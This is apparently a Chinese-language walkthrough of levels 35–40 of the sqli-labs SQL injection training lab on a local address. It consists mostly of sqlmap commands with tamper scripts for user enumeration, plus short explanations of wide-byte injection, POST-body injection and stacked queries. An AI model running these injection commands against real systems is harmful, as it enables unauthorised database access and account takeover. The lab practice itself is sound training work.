Less-35
直接跑就行了数字型python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-35/?id=1" --technique=U --users --tamper=cx.py,air.py
Less-36
使用了mysql_real_escape_string过滤,但设置了gbk编码所以可以使用宽字节注入
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-36/?id=1" --technique=U --users --tamper=unmagicquotes.py,air.py --level=2
Less-37
这关需要抓包注入剩下的跟宽字节注入都一样
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-37/" --data="uname=admin*&passwd=admin&submit=Submit" --technique=U --users --tamper=unmagicquotes.py,air.py --level=2
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n //注意sqlmap跳出来的这个选项需要选择n不然跑步出来
Less-38
直接注入即可
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-38/?id=1" --technique=U --users --tamper=unmagicquotes.py,air.py --level=2
但是这关不是叫注入而是堆叠注入
什么是堆叠注入?
顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。(就是;分割语句同时执行)
先看看这种情况的后端代码是什么样子的
使用了mysqli_multi_query() 函数,可以执行多个数据库查询语句,多个查询使用分号分割
给用户更改密码
这里使用sqlmap跑也可以但是有点麻烦以后在补上吧
Less-39
也是同样的方法只不过是不需要双引号了
Less-40
这关是无报错而已其他相同直接跑即可
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-40/?id=1" --technique=U --users --tamper=air.py --level=2